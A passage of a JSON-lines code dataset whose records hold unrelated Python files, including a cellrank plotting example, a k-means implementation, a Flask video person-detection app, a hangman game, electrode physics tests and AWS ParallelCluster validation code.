new_list\n","repo_name":"Molsim-Group/MOFtextminer","sub_path":"doc/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10821,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"} +{"seq_id":"30116223623","text":"\"\"\"\nPlot potential lineage drivers\n------------------------------\n\nThis example shows how to compute and plot expression trends for genes which may be involved in lineage decisions.\n\nWe identify these by correlating gene expression with absorption probabilities towards a specific terminal state.\n\"\"\"\n\nimport cellrank as cr\n\nadata = cr.datasets.pancreas_preprocessed(\"../example.h5ad\")\nadata\n\n# %%\n# First, we need to compute the terminal states and the absorption probabilities towards them.\ncr.tl.terminal_states(\n adata,\n cluster_key=\"clusters\",\n n_cells=30,\n n_states=3,\n softmax_scale=4,\n show_progress_bar=False,\n)\ncr.tl.lineages(adata)\n\n# %%\n# Once the lineages have been computed, we can compute the potential driver genes for each of them. It is also\n# possible to restrict this computation to just a few clusters, defined by ``cluster_key`` and ``clusters``.\n#\n# By default we are computing the driver genes for all lineages.\ndrivers = cr.tl.lineage_drivers(adata, lineages=\"Alpha\")\ndrivers\n\n# %%\n# Finally, we can plot the potential drivers. Below we plot top 3 driver genes for the `'Alpha'` lineage.\ncr.pl.lineage_drivers(adata, lineage=\"Alpha\", n_genes=3)\n","repo_name":"grenkoca/cellrank","sub_path":"examples/plotting/plot_lineage_drivers.py","file_name":"plot_lineage_drivers.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"1781748675","text":"import sys\nfrom urllib.parse import unquote\nfrom urllib.parse import quote_plus\n\ndef usage():\n print (\"Usage: python url_coder.py string\")\n\ntry:\n if sys.argv[2] != \"\":\n inputstr=sys.argv[2]\nexcept:\n usage()\n sys.exit()\n\ntry:\n if sys.argv[1] == \"decode\":\n print (unquote(inputstr))\n elif sys.argv[1] == \"encode\":\n print (quote_plus(inputstr))\n else:\n usage()\nexcept:\n usage()\n sys.exit()\n\n","repo_name":"LancreFI/shellScripts","sub_path":"url_coder.py","file_name":"url_coder.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70991913959","text":"\nimport numpy as np\nclass Kmean:\n def __init__(self, data, k):\n self.data = data\n self.k = k # k-cluster\n self.m = data.shape[0] # number of samples\n self.n = data.shape[1] # number of features\n \n def EuclidDist(self, arrA, arrB):\n '''calculate the Euclidean distance between two verctor'''\n return np.sqrt(np.sum([item*item for item in (arrA-arrB)]))\n \n def InitCenter(self):\n ''' randomly initialize a point as the center '''\n data = self.data\n n = self.n\n k = self.k\n centers = np.zeros((k, n))\n for i in range(n):\n minValue = np.min([data[:, i]]) # the mininum value of\n rangeI = np.max(data[:, i]) - minValue # the range of the column\n centers[:, i] = minValue + rangeI * np.random.rand(k, 1) # make sure the center is within the data points\n return centers\n\n def kmeans(self):\n m = self.m\n k = self.k\n data = self.data\n cluster = np.zeros((m, 2))\n Centers = self.InitCenter()\n Changed = True # flag to continue the update of center or not\n while Changed:\n Changed = False\n for i in range(m):\n minDist, minIndex = np.inf, -1\n for j in range(k):\n dist = self.EuclidDist(Centers[j, :], data[i, :]) # calculate the distance of each point\n if dist < minDist: # find the minimum distance\n minDist = dist \n minIndex = j # assign the label to the point\n if cluster[i, 0] != minIndex:\n Changed = True\n cluster[i,:] = minIndex, minDist * minDist\n \n for j in range(k):\n pointInCluster = data[np.nonzero(cluster[:,0] == j)[0]]\n Centers[j, :] = np.mean(pointInCluster, axis=0)\n return Centers, cluster\n\n","repo_name":"leovam/machine-learning-in-python","sub_path":"kmeans/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14730354364","text":"from app_config import config\nfrom env_setup import setup_test_paths\n\nsetup_test_paths()\n\nfrom agar.test import BaseTest\nfrom google_cloud_messaging import GoogleCloudMessaging\nfrom device_message_processor import (change_intent, post_unmanaged_device_info)\nfrom mockito import when\n\n__author__ = 'Bob MacNeal '\n\n\nclass TestDeviceMessageProcessor(BaseTest):\n TEST_GCM_REGISTRATION_ID = '8d70a8d78a6dfa6df76dfasd'\n DEVICE_KEY = '00d70a8d78a6dfa6df76d112'\n\n def setUp(self):\n super(TestDeviceMessageProcessor, self).setUp()\n\n def test_change_intent_invokes_google_cloud_messaging_notify_method(self):\n gcm_registration_id = self.TEST_GCM_REGISTRATION_ID\n registration_ids = [gcm_registration_id]\n payload = 'skykit.com/skdchromeapp/reset'\n data_dictionary = {'intent': payload}\n when(GoogleCloudMessaging).notify(registration_ids, data_dictionary, test_mode=False).thenReturn(None)\n change_intent(\n gcm_registration_id=gcm_registration_id,\n payload=payload,\n device_urlsafe_key='asdlkfjadksfj',\n host='http://localhost:3000',\n user_identifier='bob.macneal@agosto.com')\n\n def test_send_unmanaged_device_info_invokes_google_cloud_messaging_notify_method(self):\n gcm_registration_id = self.TEST_GCM_REGISTRATION_ID\n registration_ids = [gcm_registration_id]\n device_urlsafe_key = 'ahtzfnNreWtpdC1kaXNwbGF5LWRldmljZS1pbnRyGwsSDkNocm9tZU9zRGV2aWNlGICAgIDrop4KDA'\n data_dictionary = dict(deviceKey=device_urlsafe_key, apiToken=config.UNMANAGED_API_TOKEN)\n when(GoogleCloudMessaging).notify(registration_ids, data_dictionary, test_mode=False).thenReturn(None)\n post_unmanaged_device_info(gcm_registration_id, device_urlsafe_key, 'http://localhost:3000/')\n","repo_name":"agosto-travisblanton/fork-test","sub_path":"tests/test_device_message_processor.py","file_name":"test_device_message_processor.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41817779945","text":"import stack.commands\nfrom stack.exception import ArgRequired, CommandError\n\n\nclass Command(stack.commands.remove.appliance.command):\n\t\"\"\"\n\tRemove a firewall service rule for an appliance type.\n\tTo remove the rule, you must supply the name of the rule.\n\n\t\n\tName of an appliance type (e.g., \"backend\").\n\t\n\n\t\n\tName of the Appliance-specific rule\n\t\n\t\"\"\"\n\n\tdef run(self, params, args):\n\t\tif len(args) == 0:\n\t\t\traise ArgRequired(self, 'appliance')\n\n\t\t(rulename, ) = self.fillParams([ ('rulename', None, True) ])\n\n\t\tfor appliance in self.getApplianceNames(args):\n\t\t\t# Make sure our rule exists\n\t\t\tif self.db.count(\"\"\"\n\t\t\t\t(*) from appliance_firewall\n\t\t\t\twhere name=%s and appliance=(\n\t\t\t\t\tselect id from appliances where name=%s\n\t\t\t\t)\"\"\", (rulename, appliance)\n\t\t\t) == 0:\n\t\t\t\traise CommandError(\n\t\t\t\t\tself,\n\t\t\t\t\tf'firewall rule {rulename} does not '\n\t\t\t\t\tf'exist for appliance {appliance}'\n\t\t\t\t)\n\n\t\t\t# It exists, so delete it\n\t\t\tself.db.execute(\"\"\"\n\t\t\t\tdelete from appliance_firewall\n\t\t\t\twhere name=%s and appliance=(\n\t\t\t\t\tselect id from appliances where name=%s\n\t\t\t\t)\n\t\t\t\"\"\", (rulename, appliance))\n","repo_name":"sukhbir148/stacki","sub_path":"common/src/stack/command/stack/commands/remove/appliance/firewall/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"36562168401","text":"from flask import Flask, render_template, request, jsonify\nfrom detect import run\nimport os\nfrom moviepy.editor import VideoFileClip\nimport cv2\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('home.html')\n\n\n@app.route('/process_video', methods=['POST'])\ndef process_image():\n video_file = request.files['video'] # 사용자가 업로드한 동영상 파일\n upload_dir = \"../image/\"\n upload_path = os.path.join(upload_dir, video_file.filename)\n \n frames = []\n cap = cv2.VideoCapture(upload_path)\n fps = cap.get(cv2.CAP_PROP_FPS)\n \n frame_count = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n duration = frame_count / fps\n \n current_time = 0\n while current_time < duration:\n cap.set(cv2.CAP_PROP_POS_MSEC, int(current_time * 1000))\n success, frame = cap.read()\n if not success:\n break\n\n frames.append(frame)\n current_time += 1 \n cap.release()\n \n results = []\n for i, frame in enumerate(frames):\n save_dir = '../image/frame/' # 이미지를 저장할 경로와 파일명\n frame_path = os.path.join(save_dir, f\"frame_{i}.png\")\n cv2.imwrite(frame_path, frame)\n cnt, lab, save_path = run(weights='./runs/train/person_yolov5s_results/weights/best.pt', conf_thres=0.5, source=frame_path, exist_ok=True, line_thickness=2)\n result = {\n 'cnt': cnt,\n 'lab': lab,\n 'save_path': save_path\n }\n results.append(result)\n \n length = len(results)\n # 결과를 다른 템플릿으로 전달\n return render_template(\"result_frame.html\", results=results,length=length)\n #return jsonify(results=results, length=length)\n\nif __name__ == '__main__':\n app.run( host='127.0.0.1',port=5000, debug=True)\n ","repo_name":"minhyeong0208/detect_person","sub_path":"rendering_frame copy.py","file_name":"rendering_frame copy.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28986813578","text":"import argparse\r\n#argparse的库可以在命令行中传入参数并让程序运行\r\n\"\"\"\r\nHere are the param for the training\r\n\r\n\"\"\"\r\n\r\n\r\ndef get_args():\r\n parser = argparse.ArgumentParser()\r\n # the environment setting\r\n #type是传入的参数数据类型 help是该参数的提示信息 default是默认参数\r\n\r\n '''\r\n 使用时:\r\n python demo.py -h\r\n '''\r\n parser.add_argument('--env-name', type=str,\r\n default='HandManipulateBlockRotateZ-v0', help='the environment name') # 'FetchPush-v1'\r\n parser.add_argument('--n-epochs', type=int, default=50,\r\n help='the number of epochs to train the agent')\r\n parser.add_argument('--n-cycles', type=int, default=50,\r\n help='the times to collect samples per epoch')\r\n parser.add_argument('--n-batches', type=int, default=40,\r\n help='the times to update the network')\r\n parser.add_argument('--save-interval', type=int, default=5,\r\n help='the interval that save the trajectory')\r\n parser.add_argument('--seed', type=int, default=123, help='random seed')\r\n parser.add_argument('--num-workers', type=int, default=4,\r\n help='the number of cpus to collect samples')\r\n parser.add_argument('--replay-strategy', type=str,\r\n default='future', help='the HER strategy')\r\n parser.add_argument('--clip-return', type=float,\r\n default=50, help='if clip the returns')\r\n parser.add_argument('--save-dir', type=str,\r\n default='saved_models/', help='the path to save the models')\r\n parser.add_argument('--noise-eps', type=float,\r\n default=0.2, help='noise eps')\r\n parser.add_argument('--random-eps', type=float,\r\n default=0.3, help='random eps')\r\n parser.add_argument('--buffer-size', type=int,\r\n default=int(1e6), help='the size of the buffer')\r\n parser.add_argument('--replay-k', type=int, default=4,\r\n help='ratio to be replace')\r\n parser.add_argument('--clip-obs', type=float,\r\n default=200, help='the clip ratio')\r\n parser.add_argument('--batch-size', type=int,\r\n default=256, help='the sample batch size')\r\n parser.add_argument('--gamma', type=float, default=0.98,\r\n help='the discount factor')\r\n parser.add_argument('--action-l2', type=float, default=1, help='l2 reg')\r\n parser.add_argument('--lr-actor', type=float, default=0.001,\r\n help='the learning rate of the actor')\r\n parser.add_argument('--lr-critic', type=float, default=0.001,\r\n help='the learning rate of the critic')\r\n parser.add_argument('--polyak', type=float, default=0.95,\r\n help='the average coefficient')\r\n parser.add_argument('--n-test-rollouts', type=int,\r\n default=10, help='the number of tests')\r\n parser.add_argument('--clip-range', type=float,\r\n default=5, help='the clip range')\r\n parser.add_argument('--demo-length', type=int,\r\n default=20, help='the demo length')\r\n parser.add_argument('--cuda', action='store_true',\r\n help='if use gpu do the acceleration')\r\n parser.add_argument('--num-rollouts-per-mpi', type=int,\r\n default=2, help='the rollouts per mpi')\r\n\r\n args = parser.parse_args()\r\n\r\n return args\r\n\r\n\r\nclass Args:\r\n def __init__(self):\r\n self.n_epochs = 500 # 50\r\n self.n_cycles = 50\r\n self.n_batches = 40\r\n self.save_interval = 5\r\n self.seed = 1 # 为了复现方便,可以设一个seed,这次运行是全随机的,但下次别人运行可以用这个seed,会完全重现我的训练过程 \r\n self.num_workers = 16 # 1\r\n self.replay_strategy = 'future'\r\n self.clip_return = 50\r\n self.save_dir = 'saved_models_random_target/'\r\n self.noise_eps = 0.01 # 使用网络的action时额外增加的噪声\r\n self.random_eps = 0.3 # 有0.3 的概率完全使用随机动作\r\n self.buffer_size = 1e6/2 # 1e6的buffer存5000回合数据,可以小点\r\n self.replay_k = 4 # replay with k random states which come from the same episode as the transition being replayed and were observed after it\r\n self.clip_obs = 200\r\n self.batch_size = 256\r\n self.gamma = 0.98\r\n self.action_l2 = 1\r\n self.lr_actor = 0.001\r\n self.lr_critic = 0.001\r\n self.polyak = 0.95 # 软更新率\r\n self.n_test_rollouts = 25 #在训练时测试次数\r\n self.clip_range = 5\r\n self.demo_length = 100 # 20, 这个是demo时候用的,可以跳大点\r\n self.cuda = True\r\n self.num_rollouts_per_mpi = 2\r\n self.add_demo = True # add demo data or not\r\n self.demo_name=\"myrobot_1000_reach_demo.npz\"\r\n self.env_name = 'my_robot_plus'","repo_name":"PeiZhangNEU/open_manipulator_x_hasgravity","sub_path":"RLlib/DDPG_HER/arguments.py","file_name":"arguments.py","file_ext":"py","file_size_in_byte":5111,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"35123784961","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 30 18:47:22 2020\n@Tp-2\n@author: gtchi\n\"\"\"\nfrom Game import Game\nfrom tkinter import Tk, PhotoImage, StringVar, Label, Button, Entry, Frame\n\n\n\nclass UI:\n def __init__(self,game):\n self.__game = game\n #Creation de la fenetre\n self.__root = Tk()\n self.__root.title('Jeu du pendu')\n #defintion des variable\n self.__imgs=[PhotoImage(file=f\"../data/img/bonhomme{9-i}.gif\") for i in range(1,9)]\n self.__letter = StringVar()\n self.__hiddenword = StringVar()\n self.__error = StringVar()\n def getGame(self):\n return self.__game\n \n \n \n def start(self):\n \"\"\"Tkinter game\"\"\"\n \n \n def replay(message,message2=''):\n def restart():\n replay.destroy()\n self.__root = Tk()\n self.__root.title('Jeu du pendu')\n self.start()\n game.end()\n replay = Tk()\n Label(replay, text= message).pack(side = 'top')\n Label(replay, text= message2).pack(side = 'top')\n replay.title('Voulez vous rejouer')\n Label(replay, text='Voulez vous rejouez ?').pack(side = 'top')\n Button(replay, bg='grey', text = 'Oui' ,command = restart).pack(side = 'bottom')\n Button(replay, bg='grey', text = 'Non' ,command = replay.destroy).pack(side = 'bottom')\n replay.mainloop()\n \n def verification():\n #verifie la lettre et affiche le message\n self.__error.set(game.checkLetter(self.__letter.get()))\n self.__letter.set('') #reinitialisation de l'entry\n self.__hiddenword.set(game.getCurrent().getHiddenWord())#modification du mot\n #modification de l'image\n image.configure(image=self.__imgs[game.getTour()])\n #image.image=img2 #permet de ne pas faire disparaitre img2 par GC (GarbageCollect)\n \n #verification des fin de partie\n if game.getCurrent().getHiddenWord()==game.getCurrent().getWord():\n self.__root.destroy()\n replay('victoire!')\n if game.getTour()>=game.nbTour:\n self.__root.destroy()\n replay('Perdu...', \"Le mot etait \"+game.getCurrent().getWord())\n \n #Initialisation du jeu \n game = self.getGame()\n game.start()\n \n \n \n #Remise à 0 des variables\n self.__hiddenword.set(game.getCurrent().getHiddenWord())\n self.__letter.set('')\n self.__error.set('')\n \n \n #creation de ma frame\n Frame1 = Frame(self.__root)\n Frame1.pack()\n \n #contenu de ma fenetre\n Button(Frame1, bg='grey', text = 'Quitter' ,command = self.__root.destroy).pack(side = 'bottom')\n Label(Frame1, textvariable = self.__hiddenword).pack(side = 'left')\n Entry(Frame1, textvariable = self.__letter).pack(side = 'left')\n Label(Frame1, textvariable = self.__error).pack(side = 'left')\n Button(Frame1, text ='PROPOSER', command = verification).pack(side='left')\n image = Label(Frame1, image=self.__imgs[0])\n image.pack()\n \n self.__root.mainloop()\n \nif __name__ == '__main__':\n UI(Game('Words.txt')).start()\n\n","repo_name":"Gtchik/CS-DEV-2","sub_path":"src/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"39840934084","text":"from __future__ import (absolute_import, print_function,\n unicode_literals, division)\n\nimport unittest\n\nimport numpy as np\nfrom numpy import testing as nptest\nfrom scipy.special import sph_harm\n\nfrom electrode import transformations, utils, electrode\n\n\nclass BasicFunctionsCase(unittest.TestCase):\n def test_dummy_pool(self):\n f = lambda x, y=1, *a, **k: (x, y, a, k)\n r = utils.DummyPool().apply_async(f, (2, 3, 4), {\"a\": 5})\n self.assertEqual(r.get(), (2, 3, (4,), {\"a\": 5}))\n\n def test_apply_method(self):\n class C:\n def m(self, a):\n return a\n self.assertEqual(utils.apply_method(C(), \"m\", 1), 1)\n\n def test_norm(self):\n self.assertEqual(utils.norm([1,2,3.]), 14**.5)\n self.assertEqual(utils.norm([[1,2,3.]], 1), 14**.5)\n\n def test_expand_tensor(self):\n a = np.array([1, 2, 3.])[None, :]\n nptest.assert_equal(utils.expand_tensor(a), a)\n b = np.array([1, 2, 3, 4, 5])[None, :]\n b1 = np.array([1, 2, 3, 2, 4, 5, 3, 5, -5] # triu\n ).reshape((1, 3, 3))\n nptest.assert_equal(utils.expand_tensor(b), b1)\n c = np.random.random(5)\n ti, tj = np.triu_indices(3)\n ce = utils.expand_tensor(c[None, :])[0, ti, tj]\n nptest.assert_equal(ce[:5], c)\n nptest.assert_equal(ce[5], -c[0]-c[3])\n \n def test_expand_select_tensor(self):\n for n in 3, 5, 7, 9, 11:\n d = np.random.random(n)[None, :]\n de = utils.expand_tensor(d)\n ds = utils.select_tensor(de)\n nptest.assert_equal(d, ds)\n\n def test_expand_tensor_trace(self):\n d = np.random.random(5)[None, :]\n de = utils.expand_tensor(d)\n nptest.assert_almost_equal(de[0].trace(), 0)\n d = np.random.random(7)[None, :]\n de = utils.expand_tensor(d)\n nptest.assert_almost_equal(de[0].trace(), np.zeros((3)))\n d = np.random.random(9)[None, :]\n de = utils.expand_tensor(d)\n nptest.assert_almost_equal(de[0].trace(), np.zeros((3,3)))\n d = np.random.random(11)[None, :]\n de = utils.expand_tensor(d)\n nptest.assert_almost_equal(de[0].trace(), np.zeros((3,3,3)))\n\n def test_rotate_tensor_identity(self):\n dr = np.identity(3)\n d = np.arange(3).reshape((1,3,))\n nptest.assert_almost_equal(d, utils.rotate_tensor(d, dr, 1))\n d = np.arange(3**2).reshape((1,3,3))\n nptest.assert_almost_equal(d, utils.rotate_tensor(d, dr, 2))\n d = np.arange(3**3).reshape(1,3,3,3)\n nptest.assert_almost_equal(d, utils.rotate_tensor(d, dr, 3))\n d = np.arange(3**4).reshape(1,3,3,3,3)\n nptest.assert_almost_equal(d, utils.rotate_tensor(d, dr, 4))\n d = np.arange(3**2*5).reshape(5,3,3)\n nptest.assert_almost_equal(d, utils.rotate_tensor(d, dr, 2))\n d = np.arange(3**4*5).reshape(5,3,3,3,3)\n nptest.assert_almost_equal(d, utils.rotate_tensor(d, dr, 4))\n \n def test_rotate_tensor_rot(self):\n r = transformations.euler_matrix(*np.random.random(3))[:3, :3]\n d = np.arange(3**3*5).reshape(5,3,3,3)\n dr = utils.rotate_tensor(d, r, 3)\n drr = utils.rotate_tensor(dr, r.T, 3)\n nptest.assert_almost_equal(d, drr)\n\n def test_rotate_tensor_simple(self):\n r = transformations.euler_matrix(0, 0, np.pi/2, \"sxyz\")[:3, :3]\n d = np.arange(3)\n nptest.assert_almost_equal(d[[1, 0, 2]],\n utils.rotate_tensor(d, r, 1))\n d = np.arange(9).reshape(1,3,3)\n nptest.assert_almost_equal([[[4, -3, 5], [-1, 0, -2], [7, -6, 8]]],\n utils.rotate_tensor(d, r, 2))\n\n def test_centroid_area(self):\n p = np.array([[1, 0, 0], [2, 3, 0], [2, 7, 0], [3, 8, 0],\n [-2, 8, 0], [-5, 2, 0.]])\n a, c = utils.area_centroid(p)\n nptest.assert_almost_equal(a, 40)\n nptest.assert_almost_equal(c, [-0.7833333, 4.2083333, 0])\n\n def test_mathieu(self):\n a = np.array([.005])\n q = np.array([.2**.5])\n mu, b = utils.mathieu(1, a, q)\n nptest.assert_almost_equal(mu.real, 0., 9)\n mui = sorted(mu.imag[mu.imag > 0])\n nptest.assert_almost_equal(mui[0], (a+q**2/2)**.5, 2)\n nptest.assert_almost_equal(mui[0], [.33786], 5)\n n = 3\n a = np.arange(n**2).reshape(n,n)\n q = np.arange(n**2)[::-1].reshape(n,n)*10\n mu, b = utils.mathieu(3, a, q)\n #nptest.assert_almost_equal(mu, [.1, .2, .3])\n #nptest.assert_almost_equal(b, )\n\n def test_polygon_value(self):\n p = np.array([[1., 0], [2, 3], [2, 7], [3, 8],\n [-2, 8], [-5, 2]])\n x = np.array([[1,2,3.]])\n nptest.assert_almost_equal(\n electrode.polygon_potential(x, [p], 1, 0, 0, 0, None),\n [[.24907]])\n \n def test_polygon_value_grad(self):\n p = np.array([[1., 0], [2, 3], [2, 7], [3, 8],\n [-2, 8], [-5, 2]])\n x = np.array([[1,2,3.]])\n nptest.assert_almost_equal(\n electrode.polygon_potential(x, [p], 1, 1, 0, 0, None),\n [[-0.0485227, 0.0404789, -0.076643]])\n\n\nclass SphHarmCase(unittest.TestCase):\n def setUp(self):\n c = np.ones(3)*0.\n s = np.ones(3)*1.\n self.nn = 3\n n = np.ones(3)*(self.nn*2+1)\n o = c-(n-1)/2*s\n self.x = np.mgrid[[slice(oi, oi+ni*si, si) for oi, ni, si in\n zip(o, n, s)]]\n self.xt = self.x.reshape(3, -1).T\n xy = np.square(self.x[:2]).sum(0)\n self.r = np.sqrt(xy+np.square(self.x[2]))\n self.theta = np.arctan2(np.sqrt(xy), self.x[2])\n self.phi = np.arctan2(self.x[1], self.x[0])\n self.e = electrode.GridElectrode(data=[], origin=o, spacing=s)\n\n def test_analysis(self):\n n = 6\n for l in range(n):\n for m in range(-l, l+1):\n y = sph_harm(abs(m), l, self.phi, self.theta)\n y = {-1: 2**.5*y.real, 0: y.real, 1: 2**.5*y.imag}[np.sign(m)]\n self.e.data = [(y*self.r**l)[:, :, :, None]]\n self.e.generate(n)\n for k in range(n):\n p = self.e.potential(self.xt, k).T\n a = utils.cartesian_to_spherical_harmonics(p)\n a = a.T.reshape(self.x[0].shape + (a.shape[0],))\n ac = a[self.nn, self.nn, self.nn]\n if k == l:\n nptest.assert_allclose(ac, np.identity(2*l+1)[l-m],\n rtol=1e-12, atol=1e-12)\n elif not (l > k and (l-k)%2 == 0): # FIXME\n nptest.assert_allclose(ac, 0, atol=1e-12)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"nist-ionstorage/electrode","sub_path":"electrode/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":6698,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"18"} +{"seq_id":"9364444585","text":"string = input()\nabc = 'abcdefghijklmnopqrstuvwxyz'\nliist = []\nfor i in abc:\n a = string.count(i)\n if a > 0:\n liist.append(a)\ncount_2 = 0\ncount_not2 = 0\nfor i in liist:\n if i % 2 == 0 and i != 0:\n count_2 += 1\n elif i != 0:\n count_not2 += 1\nif (count_2 == 1 and count_not2 == 0) or (count_not2 == 1 and count_2 == 0):\n print(\"YES\")\nelif count_not2 > 1:\n print(\"NO\")\nelse:\n print(\"YES\")\n\n \n","repo_name":"AndrewOleksiuk/Algorithms","sub_path":"algotester0331.py","file_name":"algotester0331.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"24860552563","text":"import abc\nimport sys\nfrom abc import abstractmethod\n\nimport boto3\nfrom botocore.exceptions import ClientError\n\nfrom pcluster.utils import (\n error,\n get_availability_zone_of_subnet,\n get_supported_az_for_one_instance_type,\n is_hit_enabled_cluster,\n)\n\nif sys.version_info >= (3, 4):\n ABC = abc.ABC\nelse:\n ABC = abc.ABCMeta(\"ABC\", (), {})\n\n\nclass ClusterModel(ABC):\n \"\"\"\n Describes the model of the cluster produced by a configuration.\n\n The currently supported cluster models are:\n - SIT: Single Instance Type - One single queue and one instance type per queue\n - HIT: Heterogeneous Instance Types - Multiple queues and multiple instance types per queue\n \"\"\"\n\n def __init__(self, name):\n self.name = name\n\n @abstractmethod\n def get_cluster_section_definition(self):\n \"\"\"Get the cluster section definition used by the cluster model.\"\"\"\n pass\n\n @abstractmethod\n def test_configuration(self, pcluster_config):\n \"\"\"Do dryrun tests for the configuration.\"\"\"\n pass\n\n @abstractmethod\n def get_start_command(self, pcluster_config):\n \"\"\"Get the start command for the model.\"\"\"\n pass\n\n @abstractmethod\n def get_stop_command(self, pcluster_config):\n \"\"\"Get the stop command for the model.\"\"\"\n pass\n\n def _ec2_run_instance(self, pcluster_config, **kwargs): # noqa: C901 FIXME!!!\n \"\"\"Wrap ec2 run_instance call. Useful since a successful run_instance call signals 'DryRunOperation'.\"\"\"\n try:\n boto3.client(\"ec2\").run_instances(**kwargs)\n except ClientError as e:\n code = e.response.get(\"Error\").get(\"Code\")\n message = e.response.get(\"Error\").get(\"Message\")\n subnet_id = kwargs[\"NetworkInterfaces\"][0][\"SubnetId\"]\n if code == \"DryRunOperation\":\n pass\n elif code == \"UnsupportedOperation\":\n if \"does not support specifying CpuOptions\" in message:\n pcluster_config.error(message.replace(\"CpuOptions\", \"disable_hyperthreading\"))\n pcluster_config.error(message)\n elif code == \"InstanceLimitExceeded\":\n pcluster_config.error(\n \"You've reached the limit on the number of instances you can run concurrently \"\n \"for the configured instance type.\\n{0}\".format(message)\n )\n elif code == \"InsufficientInstanceCapacity\":\n pcluster_config.error(\"There is not enough capacity to fulfill your request.\\n{0}\".format(message))\n elif code == \"InsufficientFreeAddressesInSubnet\":\n pcluster_config.error(\n \"The specified subnet does not contain enough free private IP addresses \"\n \"to fulfill your request.\\n{0}\".format(message)\n )\n elif code == \"InvalidParameterCombination\":\n if \"associatePublicIPAddress\" in message:\n # Instances with multiple Network Interfaces cannot currently take public IPs.\n # This check is meant to warn users about this problem until services are fixed.\n pcluster_config.warn(\n \"The instance type '{0}' cannot take public IPs. \"\n \"Please make sure that the subnet with id '{1}' has the proper routing configuration to allow \"\n \"private IPs reaching the Internet (e.g. a NAT Gateway and a valid route table).\".format(\n kwargs[\"InstanceType\"], subnet_id\n )\n )\n elif code == \"Unsupported\" and get_availability_zone_of_subnet(\n subnet_id\n ) not in get_supported_az_for_one_instance_type(kwargs[\"InstanceType\"]):\n # If an availability zone without desired instance type is selected, error code is \"Unsupported\"\n # Therefore, we need to write our own code to tell the specific problem\n current_az = get_availability_zone_of_subnet(subnet_id)\n qualified_az = get_supported_az_for_one_instance_type(kwargs[\"InstanceType\"])\n pcluster_config.error(\n \"Your requested instance type ({0}) is not supported in the Availability Zone ({1}) of \"\n \"your requested subnet ({2}). Please retry your request by choosing a subnet in \"\n \"{3}. \".format(kwargs[\"InstanceType\"], current_az, subnet_id, qualified_az)\n )\n else:\n pcluster_config.error(\n \"Unable to validate configuration parameters for instance type '{0}'. \"\n \"Please double check your cluster configuration.\\n{1}\".format(kwargs[\"InstanceType\"], message)\n )\n\n def _get_latest_alinux_ami_id(self):\n \"\"\"Get latest alinux ami id.\"\"\"\n try:\n alinux_ami_id = (\n boto3.client(\"ssm\")\n .get_parameters_by_path(Path=\"/aws/service/ami-amazon-linux-latest\")\n .get(\"Parameters\")[0]\n .get(\"Value\")\n )\n except ClientError as e:\n error(\"Unable to retrieve Amazon Linux AMI id.\\n{0}\".format(e.response.get(\"Error\").get(\"Message\")))\n raise\n\n return alinux_ami_id\n\n def public_ips_in_compute_subnet(self, pcluster_config, network_interfaces_count):\n \"\"\"Tell if public IPs will be used in compute subnet.\"\"\"\n vpc_section = pcluster_config.get_section(\"vpc\")\n head_node_subnet_id = vpc_section.get_param_value(\"master_subnet_id\")\n compute_subnet_id = vpc_section.get_param_value(\"compute_subnet_id\")\n use_public_ips = vpc_section.get_param_value(\"use_public_ips\") and (\n # For single NIC instances we check only if subnet is the same of head node\n (not compute_subnet_id or compute_subnet_id == head_node_subnet_id)\n # For multiple NICs instances we check also if subnet is different\n # to warn users about the current lack of support for public IPs\n or (network_interfaces_count > 1)\n )\n\n return use_public_ips\n\n def build_launch_network_interfaces(\n self, network_interfaces_count, use_efa, security_group_ids, subnet, use_public_ips\n ):\n \"\"\"Build the needed NetworkInterfaces to launch an instance.\"\"\"\n network_interfaces = []\n for device_index in range(network_interfaces_count):\n network_interfaces.append(\n {\n \"DeviceIndex\": device_index,\n \"NetworkCardIndex\": device_index,\n \"InterfaceType\": \"efa\" if use_efa else \"interface\",\n \"Groups\": security_group_ids,\n \"SubnetId\": subnet,\n }\n )\n\n # If instance types has multiple Network Interfaces we also check for\n if network_interfaces_count > 1 and use_public_ips:\n network_interfaces[0][\"AssociatePublicIpAddress\"] = True\n return network_interfaces\n\n\ndef infer_cluster_model(config_parser=None, cluster_label=None, cfn_stack=None):\n \"\"\"\n Infer the cluster model from the provided configuration.\n\n The configuration can be provided as coming from CloudFormation (CfnParams) or from config_file, with cluster label\n and a config_parser instance.\n \"\"\"\n return (\n _infer_cluster_model_from_cfn(cfn_stack)\n if cfn_stack\n else _infer_cluster_model_from_file(config_parser, cluster_label)\n )\n\n\ndef _infer_cluster_model_from_file(config_parser, cluster_label):\n \"\"\"\n Infer the cluster model from the configuration file.\n\n SIT style config files are supported also with Slurm, so check is performed on queue_settings.\n \"\"\"\n return (\n ClusterModel.HIT\n if 